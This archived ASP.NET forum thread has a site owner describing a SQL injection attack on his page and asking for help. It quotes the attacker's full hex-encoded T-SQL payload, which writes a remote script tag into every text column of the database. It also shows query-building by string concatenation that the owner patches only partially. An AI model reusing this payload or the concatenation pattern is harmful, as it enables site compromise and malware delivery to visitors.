473,394 Members | 1,817 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

home > topics > asp.net > questions > sql injection problem

Join Bytes to post your question to a community of 473,394 software developers and data experts.

sql injection problem

I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.

Here's an example from the readme.html file for the tool:

msscasi_asp.exe /input="c:\source\logon.asp" /output="warnings.xml"

Here's one of the warnigns I get:

** msscasi_asp: Parse warning at C:\Inetpub\wwwroot\MySite\logon.aspx (line
2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.

And there's nothing in my output file. It looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->

What do I do to run this on my aspx pages?

Can anyone help me out here? If I'm in the wrong newsgroup for this, please
tell me where I should post instead.

Thanks,

Keith
Aug 12 '08 #1
2 1900
By teh way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <"" Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End Sub
Here's what I chagned it to (the line that tests for IsNumeric is new):

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <"" Then
If IsNumeric(Request.QueryString("ClassmateID")) And
(Len(Request.QueryString("ClassmateID").ToString) < 6) Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End If
End Sub

I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:

ClassmateID=616;DECLARE%20@S%20VARCHAR(4000);SET%2 0@S=CAST(0x4445434C4152452
04054205641524348415228323535292C40432056415243484 1522832353529204445434C415
245205461626C655F437572736F7220435552534F5220464F5 22053454C45435420612E6E616
D652C622E6E616D652046524F4D207379736F626A656374732 0612C737973636F6C756D6E732
06220574845524520612E69643D622E696420414E4420612E7 8747970653D27752720414E442
028622E78747970653D3939204F5220622E78747970653D333 5204F5220622E78747970653D3
23331204F5220622E78747970653D31363729204F50454E205 461626C655F437572736F72204
645544348204E4558542046524F4D205461626C655F4375727 36F7220494E544F2040542C404
3205748494C4528404046455443485F5354415455533D30292 0424547494E204558454328275
55044415445205B272B40542B275D20534554205B272B40432 B275D3D525452494D28434F4E5
645525428564152434841522834303030292C5B272B40432B2 75D29292B27273C73637269707
4207372633D687474703A2F2F7777772E706F72762E72752F6 A732E6A733E3C2F73637269707
43E27272729204645544348204E4558542046524F4D2054616 26C655F437572736F7220494E5
44F2040542C404320454E4420434C4F5345205461626C655F4 37572736F72204445414C4C4F4
3415445205461626C655F437572736F7220%20AS%20VARCHAR (4000));EXEC(@S);

So it seems to me if I test for numeric and limit the lenght of the query
string I should be covered.

Any comments?
(still wondering about the MS injection analyzer too also)

Thanks,

Keith

"Keith G Hicks" <kr*@comcast.netwrote in message
news:#k**************@TK2MSFTNGP02.phx.gbl...
I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.

Here's an example from the readme.html file for the tool:

msscasi_asp.exe /input="c:\source\logon.asp" /output="warnings.xml"

Here's one of the warnigns I get:

** msscasi_asp: Parse warning at C:\Inetpub\wwwroot\MySite\logon.aspx
(line
2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.

And there's nothing in my output file. It looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->

What do I do to run this on my aspx pages?

Can anyone help me out here? If I'm in the wrong newsgroup for this,
please
tell me where I should post instead.

Thanks,

Keith



Aug 12 '08 #2
Keith G Hicks wrote:
By teh way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <"" Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End Sub
Here's what I chagned it to (the line that tests for IsNumeric is new):

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <"" Then
If IsNumeric(Request.QueryString("ClassmateID")) And
(Len(Request.QueryString("ClassmateID").ToString) < 6) Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End If
End Sub

I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:

ClassmateID=616;DECLARE%20@S%20VARCHAR(4000);SET%2 0@S=CAST(0x4445434C4152452
04054205641524348415228323535292C40432056415243484 1522832353529204445434C415
245205461626C655F437572736F7220435552534F5220464F5 22053454C45435420612E6E616
D652C622E6E616D652046524F4D207379736F626A656374732 0612C737973636F6C756D6E732
06220574845524520612E69643D622E696420414E4420612E7 8747970653D27752720414E442
028622E78747970653D3939204F5220622E78747970653D333 5204F5220622E78747970653D3
23331204F5220622E78747970653D31363729204F50454E205 461626C655F437572736F72204
645544348204E4558542046524F4D205461626C655F4375727 36F7220494E544F2040542C404
3205748494C4528404046455443485F5354415455533D30292 0424547494E204558454328275
55044415445205B272B40542B275D20534554205B272B40432 B275D3D525452494D28434F4E5
645525428564152434841522834303030292C5B272B40432B2 75D29292B27273C73637269707
4207372633D687474703A2F2F7777772E706F72762E72752F6 A732E6A733E3C2F73637269707
43E27272729204645544348204E4558542046524F4D2054616 26C655F437572736F7220494E5
44F2040542C404320454E4420434C4F5345205461626C655F4 37572736F72204445414C4C4F4
3415445205461626C655F437572736F7220%20AS%20VARCHAR (4000));EXEC(@S);

So it seems to me if I test for numeric and limit the lenght of the query
string I should be covered.

Any comments?
(still wondering about the MS injection analyzer too also)

Thanks,

Keith

"Keith G Hicks" <kr*@comcast.netwrote in message
news:#k**************@TK2MSFTNGP02.phx.gbl...
>I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.

Here's an example from the readme.html file for the tool:

msscasi_asp.exe /input="c:\source\logon.asp" /output="warnings.xml"

Here's one of the warnigns I get:

** msscasi_asp: Parse warning at C:\Inetpub\wwwroot\MySite\logon.aspx
(line
>2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.

And there's nothing in my output file. It looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->

What do I do to run this on my aspx pages?

Can anyone help me out here? If I'm in the wrong newsgroup for this,
please
>tell me where I should post instead.

Thanks,

Keith



What you need to do is use SQLParameters to stop SQL injection. There
arer lots of articles on this (search Google). Basically what you would
do is have your where statment something like WHERE ClassmateID =
@ClassmateID. Then create a SqlParameter which would get populated from
the QueryString.

LS
Aug 12 '08 #3
New Post

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

1
checking POST vars for SQL INJECTION
by: Cogswell | last post by:
I am working on an ecommerce app and want to be able to take my entire POST results as one item (or iterate through them) and check for any malicious SQL INJECTION items. After checking/escaping...
ASP / Active Server Pages
11
SQL Injection - Stored Procedures
by: Bã§TãRÐ | last post by:
I have been working on this particular project for a little over 2 weeks now. This product contains between 700-900 stored procedures to handle just about all you can imagine within the product. I...
ASP / Active Server Pages
5
solution for preventing injection attacks
by: www.douglassdavis.com | last post by:
I have an idea for preventing sql injection attacks, however it would have to be implemented by the database vendor. Let me know if I am on the right track, this totally off base, or already...
PHP
11
Another form of SQL injection
by: howachen | last post by:
Hi, In many web articles, people focusing on SQL injection in the form of : e.g. /**********************************************************/ $name = "tom' UNION blah blah blah" $query =...
PHP
8
Email injection on a contact form
by: stirrell | last post by:
Hello, One problem that I had been having is stopping email injections on contact forms. I did some research, read up on it and felt like I had created a working solution. I hadn't gotten any...
PHP
29
IIS SQL Injection woes...
by: sinbuzz | last post by:
Hi, I'm curious about the best way to avoid SQL Injection attacks against my web server. Currently I'm on IIS. I might be willing to switch to something like Apache but I'm not sure if SQL...
C# / C Sharp
7
How can I create an innocuous SQL injection attempt to test apps and evaluate the result programmatically?
by: | last post by:
There are assorted "SQL Injection vulnerability assessment tools" out there. They scan your site and send your report. They also take your money. We don't have the money so I was wondering if I...
ASP.NET
2
question about validation and sql injection
by: Sudhakar | last post by:
A) validating username in php as part of a registration form a user fills there desired username and this is stored in a mysql. there are certain conditions for the username. a) the username...
PHP
12
sql injection
by: shank | last post by:
I've been hit again using DW, parameterized queries and stored procedures. I'm guessing I was not strict enough with character counts and allowing to long of a string to pass. Aside from that,...
ASP / Active Server Pages
0
How to turn on java script in a villaon keypad mobile phone
by: Charles Arthur | last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
Java
0
Batch import of multiple excel files into the database
by: ryjfgjl | last post by:
If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...
Data Management
0
Merging data from multiple Excel files
by: ryjfgjl | last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
Data Management
0
Migrating Website to Cloud - Emmanuel Katto
by: emmanuelkatto | last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud. Please let me know. Thanks! Emmanuel
General
0
BarryA
Navigating the Data Structures and Algorithms (DSA)
by: BarryA | last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
Algorithms / Advanced Math
1
Looking to do Android software development, any suggestions? Is flutter better?
by: nemocccc | last post by:
hello, everyone, I want to develop a software for my android phone for daily needs, any suggestions?
General
1
Is that possible of reading the .csv file in column wise and the column have different lengths ?
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
C / C++
0
How to build RAID in BIOS?
by: Hystou | last post by:
There are some requirements for setting up RAID: 1. The motherboard and BIOS support RAID configuration. 2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
Computer Hardware
0
marktang
What is ONU?
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
General

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes:
Post a Job
Sponsored Posts
Platinum & Gold Sponsors
Hire Now!